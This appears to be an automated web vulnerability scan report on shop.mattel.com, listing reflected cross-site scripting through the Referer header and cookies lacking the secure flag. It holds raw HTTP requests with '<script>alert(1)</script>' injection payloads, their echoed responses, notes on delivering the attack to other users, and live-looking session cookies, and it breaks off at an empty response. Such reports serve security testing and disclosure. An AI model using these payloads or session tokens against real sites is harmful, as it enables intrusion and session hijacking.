<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd;u2=1;u3=;u1=;ord=1;num=40158534?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83600"><script>alert(1)</script>03a94f135fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET /category/index.jsp?categoryId=3741286 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:13 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd;u2=5;u3=;u1=;ord=1;num=88359962?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb3"><script>alert(1)</script>fe48f0b8dca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET /history/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:34 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45088
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca;u2=1;u3=;u1=;ord=1;num=33774843?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129a5"><script>alert(1)</script>d516d332891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:51 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891;u2=1;u3=;u1=;ord=1;num=32562816?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b892"><script>alert(1)</script>2213eb59c24 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET /product/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:48 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24;u2=1;u3=;u1=;ord=1;num=60684825?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c6f"><script>alert(1)</script>27e45151b39 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search/controller.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:35 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45183
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39;u2=1;u3=;u1=3747401524;ord=1;num=17518156?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>a8c907b55ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shop/index.jsp?categoryId=3719992 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:38 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff;u2=5;u3=;u1=;ord=1;num=82099516?" width="1" height="1" frameborder="0"> ...[SNIP]...
2. SSL cookie without secure flag set
There are 11 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /brand/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/cart/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:11:07 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 315
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coreg/index.jsp?step=logout HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:15:36 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=home P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 305
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emailSignup/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
